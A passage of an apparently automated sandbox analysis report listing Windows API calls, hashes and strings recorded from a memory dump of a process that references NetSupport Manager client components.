                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,11147278), ref: 11147181
                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,11147278), ref: 11147187
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Thread$CloseHandle$CodeCreateExitObjectOpenSingleWait
                                                                                                              • String ID:
                                                                                                              • API String ID: 180989782-0
                                                                                                              • Opcode ID: f968cd3be34acbbfc001fc2c5c2cf1c984ef6abb93f92428a018694f843edebd
                                                                                                              • Instruction ID: 262247fb5796f255492f056fed215dfab2d13c04184fcb9cbdc2136a2e7489e8
                                                                                                              • Opcode Fuzzy Hash: f968cd3be34acbbfc001fc2c5c2cf1c984ef6abb93f92428a018694f843edebd
                                                                                                              • Instruction Fuzzy Hash: 6901FA75D14219ABDB04DFA8C845BAEBBB8EF08710F108166F924E7284D774AA018B91
                                                                                                              APIs
                                                                                                              • SetEvent.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30A8
                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7594), ref: 110B30B5
                                                                                                              • CloseHandle.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30C8
                                                                                                              • CloseHandle.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30D5
                                                                                                              • WaitForSingleObject.KERNEL32(?,000003E8,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30F3
                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7594), ref: 110B3100
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseHandle$EventObjectSingleWait
                                                                                                              • String ID:
                                                                                                              • API String ID: 2857295742-0
                                                                                                              • Opcode ID: de728af195af138cefa6dff90218103564fc584f7cc06855e29f8d807c559bfa
                                                                                                              • Instruction ID: 8ed48fa67f8c8c814876f8dc7215a606f8693e2702a4d531ac155f54366f369e
                                                                                                              • Opcode Fuzzy Hash: de728af195af138cefa6dff90218103564fc584f7cc06855e29f8d807c559bfa
                                                                                                              • Instruction Fuzzy Hash: 46011A75A087049BE7A0DFB988D4A96F7ECEF58300F11592EE5AAC3200CB78B8448F50
                                                                                                              APIs
                                                                                                              • MapWindowPoints.USER32(?,00000000,?,00000002), ref: 1107712B
                                                                                                                • Part of subcall function 11076470: DeferWindowPos.USER32(8B000EA9,00000000,D8E85BC0,33CD335E,?,00000000,33CD335E,110771C6), ref: 110764B3
                                                                                                              • EqualRect.USER32(?,?), ref: 1107713C
                                                                                                              • SetWindowPos.USER32(00000000,00000000,?,33CD335E,D8E85BC0,8B000EA9,00000014,?,?,?,?,?,1107731A,00000000,?), ref: 11077196
                                                                                                              Strings
                                                                                                              • m_hWnd, xrefs: 11077177
                                                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077172
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Window$DeferEqualPointsRect
                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                              • API String ID: 2754115966-2830328467
                                                                                                              • Opcode ID: 99985b2635142920f8b9c22496a84f2b0050643658386b35a5a33d160634cd24
                                                                                                              • Instruction ID: 41b5b1a8551b5e1f2f99f8414896ea4fcac58e3e889cf17ca758b789060a613c
                                                                                                              • Opcode Fuzzy Hash: 99985b2635142920f8b9c22496a84f2b0050643658386b35a5a33d160634cd24
                                                                                                              • Instruction Fuzzy Hash: E0413EB5A006099FDB14CFA9C884EAAFBF5FF88704F108559E9559B344D770AD00CBA4
                                                                                                              APIs
                                                                                                              • FindResourceA.KERNEL32(00000000,00001770,0000000A), ref: 1108918F
                                                                                                              • LoadResource.KERNEL32(00000000,00000000,?,00000000,?,110CEF56,?), ref: 110891A4
                                                                                                              • LockResource.KERNEL32(00000000,?,00000000,?,110CEF56,?), ref: 110891D6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Resource$FindLoadLock
                                                                                                              • String ID: ..\ctl32\Errorhan.cpp$hMap
                                                                                                              • API String ID: 2752051264-327499879
                                                                                                              • Opcode ID: 822e2482afd153fa47cf4ddbc35e772a2b3a06937125cb698dae634270013ce3
                                                                                                              • Instruction ID: ac104577f0cb8d44e6482e86c7e4f76e51294e6aac98140987b3b76ba3c25106
                                                                                                              • Opcode Fuzzy Hash: 822e2482afd153fa47cf4ddbc35e772a2b3a06937125cb698dae634270013ce3
                                                                                                              • Instruction Fuzzy Hash: 08110D3AF4C22556DB12EBE9AC45B69B7E89BC07A8B410475FC6CD71C4FA61D440C3E1
                                                                                                              APIs
                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000100,00000000), ref: 1114314B
                                                                                                              • _strrchr.LIBCMT ref: 1114315A
                                                                                                              • _strrchr.LIBCMT ref: 1114316A
                                                                                                              • wsprintfA.USER32 ref: 11143185
                                                                                                                • Part of subcall function 111456A0: GetModuleHandleA.KERNEL32(NSMTRACE,11194AB8), ref: 111456BA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Module_strrchr$FileHandleNamewsprintf
                                                                                                              • String ID: BILD
                                                                                                              • API String ID: 2529650285-1114602597
                                                                                                              • Opcode ID: 832b53a00f043e857d3b8e09e9a2ce5d770147cd639c4bf1822df3017942b825
                                                                                                              • Instruction ID: d978b5afe12e8555e920acd6faf46f6bc40337599c773746d871781ff4fb06a8
                                                                                                              • Opcode Fuzzy Hash: 832b53a00f043e857d3b8e09e9a2ce5d770147cd639c4bf1822df3017942b825
                                                                                                              • Instruction Fuzzy Hash: DD21DD31A182698FE712EF348D407DAFBB4DF15B0CF2000D8D8850B182D7716885C7A0
                                                                                                              APIs
                                                                                                              • GetProfileStringA.KERNEL32(Windows,Device,No default printer,,LPT1:,?,00000050), ref: 11065366
                                                                                                              • _memmove.LIBCMT ref: 110653B1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ProfileString_memmove
                                                                                                              • String ID: Device$No default printer,,LPT1:$Windows
                                                                                                              • API String ID: 1665476579-2460060945
                                                                                                              • Opcode ID: b42f47fad53366f1e4ac447008a1a2d6fd591c8f9db6545ab0f545fe689f24a8
                                                                                                              • Instruction ID: a358cf5610f4a81608be9fe47ec1da84b056d0ceaed1d9bd2f397f709d6f9fc8
                                                                                                              • Opcode Fuzzy Hash: b42f47fad53366f1e4ac447008a1a2d6fd591c8f9db6545ab0f545fe689f24a8
                                                                                                              • Instruction Fuzzy Hash: 0E119E35D002669AD700CFB0DC45BFEBBACDF01788F144158DC869B240EAF22609C3E1
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FreeString$__wcsicoll_memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 3719176846-0
                                                                                                              • Opcode ID: 441a99ce500d99f467cd7fd3aeec64a7d709f35996a15428944c20697e7ebd2f
                                                                                                              • Instruction ID: f73372903cd30c0382670b71593fb0b3797c4e2875fb117f6f51c869b4ccb2fb
                                                                                                              • Opcode Fuzzy Hash: 441a99ce500d99f467cd7fd3aeec64a7d709f35996a15428944c20697e7ebd2f
                                                                                                              • Instruction Fuzzy Hash: 53A10A75E006299FCB21CF59CC84ADEB7B9AF89305F2045D9E50DAB610DB32AE85CF50
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FreeString$__wcsicoll_memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 3719176846-0
                                                                                                              • Opcode ID: 630363bdb13d22254993ecf68dacbf692c7bf3f03afba6e05313967c32aba816
                                                                                                              • Instruction ID: afd3f22c8fe7dd5f2f13fef18bd13733cf22d578236402d79b842a18f9b7ad91
                                                                                                              • Opcode Fuzzy Hash: 630363bdb13d22254993ecf68dacbf692c7bf3f03afba6e05313967c32aba816
                                                                                                              • Instruction Fuzzy Hash: E3A11871E006299FCB21DF59CC84ADEB7B9AF89305F2041D9E50DAB610DB32AE85CF50
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: wsprintf$VisibleWindow
                                                                                                              • String ID: %d,%d,%d,%d,%d,%d
                                                                                                              • API String ID: 1671172596-1913222166
                                                                                                              • Opcode ID: 8791ca63a79dced235f4e3776a7ea81ab1c93e4dd005f09928dbe6592e314a28
                                                                                                              • Instruction ID: 208af751730b9df0a36513b51cfb93f89bd03d9f93b9dbce85b9ce09b73d059e
                                                                                                              • Opcode Fuzzy Hash: 8791ca63a79dced235f4e3776a7ea81ab1c93e4dd005f09928dbe6592e314a28
                                                                                                              • Instruction Fuzzy Hash: 465181746001159FD710DB68CC90F9AB7F9BF88708F108698F6599B391DB70ED45CBA0
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              • BltPending skipping Blt, sinceUpdate=%d ms, sinceBlt=%d ms, from=%s, xrefs: 1111706E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CountTick$DeleteObject
                                                                                                              • String ID: BltPending skipping Blt, sinceUpdate=%d ms, sinceBlt=%d ms, from=%s
                                                                                                              • API String ID: 3011517232-3209293507
                                                                                                              • Opcode ID: 3804ad2b8b8d45a3881d6a1d8f9e7176cbf39d2a15b6b3a9b1851c2b4258d80b
                                                                                                              • Instruction ID: 71694b1901628e7c3f0e0f97bec8b89b6520565b9ddb22d4603e25af3e6b7442
                                                                                                              • Opcode Fuzzy Hash: 3804ad2b8b8d45a3881d6a1d8f9e7176cbf39d2a15b6b3a9b1851c2b4258d80b
                                                                                                              • Instruction Fuzzy Hash: 62414F75A00F058FD724CF79CD856ABF7E1FF84219F104A3ED56A9A244EB3565418F00
                                                                                                              APIs
                                                                                                              • _memmove.LIBCMT ref: 110D1128
                                                                                                                • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                                                              • String ID: ..\CTL32\NSMString.cpp$IsA()$cchLen<=0 || cchLen<=(int) _tcslen(pszStr)
                                                                                                              • API String ID: 1528188558-323366856
                                                                                                              • Opcode ID: 68b70f9a2bf70a58353feb4a735461465b776518e9ae676a20bb0fc5dc14d86d
